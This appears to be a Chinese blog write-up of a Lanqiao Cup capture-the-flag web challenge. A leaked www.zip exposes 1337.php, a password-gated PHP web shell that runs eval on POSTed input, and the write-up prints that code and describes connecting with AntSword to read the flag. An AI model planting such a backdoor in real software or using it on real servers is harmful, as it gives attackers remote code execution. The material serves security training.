蓝桥杯-网络安全比赛题目-遗漏的压缩包

小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击"下发赛题"后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)
  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
php 复制代码
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于'217f81b8ff0a1ab138a8e1bdc031262e'

输入密码,通过蚁剑进入SHELL

连接成功

进入根目录,找到flag

成功夺旗!

相关推荐
follycat1 分钟前
信息收集--CDN绕过
网络·安全·网络安全
zhangjr057518 分钟前
【HarmonyOS Next】鸿蒙实用装饰器一览(一)
前端·harmonyos·arkts
黑客Ela28 分钟前
网络安全问题概述
安全·web安全·php
不爱学习的YY酱30 分钟前
【操作系统不挂科】<CPU调度(13)>选择题(带答案与解析)
java·linux·前端·算法·操作系统
Wh1teR0se30 分钟前
详解php://filter--理论
web安全·php
木子七1 小时前
vue2-vuex
前端·vue
执键行天涯1 小时前
【日常经验】修改大数据量的表字段类型,怎么修改更快
sql
麻辣_水煮鱼1 小时前
vue数据变化但页面不变
前端·javascript·vue.js
BY—-组态1 小时前
web组态软件
前端·物联网·工业互联网·web组态·组态
一条晒干的咸魚1 小时前
【Web前端】实现基于 Promise 的 API:alarm API
开发语言·前端·javascript·api·promise